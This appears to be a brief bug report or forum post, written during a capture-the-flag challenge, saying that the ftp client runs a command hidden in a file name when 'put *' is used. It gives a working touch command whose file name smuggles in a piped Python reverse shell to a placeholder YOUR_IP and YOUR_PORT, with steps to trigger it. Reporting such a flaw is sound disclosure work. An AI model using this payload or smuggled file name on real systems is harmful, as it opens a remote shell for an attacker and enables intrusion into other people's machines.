I've found that with a certain file name, `ftp` executes code in the file name. The file is created with the following command
``` touch "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",YOUR_PORT));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")';echo .csv" ``` To get code to execute, simply have the file in the current directory (haven't tested with multiple files in the directory) and run `put *` to upload everything. This bug was found while I was doing a CTF (capture the flag) challenge and I haven't been able to connect to the same server since for further testing.
